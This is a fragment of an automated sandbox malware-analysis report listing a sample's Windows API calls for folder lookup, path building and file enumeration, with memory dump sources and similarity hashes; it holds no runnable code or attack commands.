                          • Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 01014F7A
                        • lstrcat.KERNEL32(?,01021070), ref: 01014F97
                        • lstrcat.KERNEL32(?,01898F98), ref: 01014FAB
                        • lstrcat.KERNEL32(?,01021074), ref: 01014FBD
                          • Part of subcall function 01014910: wsprintfA.USER32 ref: 0101492C
                          • Part of subcall function 01014910: FindFirstFileA.KERNEL32(?,?), ref: 01014943
                          • Part of subcall function 01014910: StrCmpCA.SHLWAPI(?,01020FDC), ref: 01014971
                          • Part of subcall function 01014910: StrCmpCA.SHLWAPI(?,01020FE0), ref: 01014987
                          • Part of subcall function 01014910: FindNextFileA.KERNEL32(000000FF,?), ref: 01014B7D
                          • Part of subcall function 01014910: FindClose.KERNEL32(000000FF), ref: 01014B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 009adf4939ff49845aab2eb1cced55519ab9962195fcae1142cbeeda2cb9580b
                        • Instruction ID: f20483b40bea3ee0737a9acaf1eb0292df7d49f856ded2c751cc4e75c35ad191
                        • Opcode Fuzzy Hash: 009adf4939ff49845aab2eb1cced55519ab9962195fcae1142cbeeda2cb9580b
                        • Instruction Fuzzy Hash: 4D21B87AA40205A7D764F7A0EC49ED9333DE764700F404549B6CA97188EE7497C98B91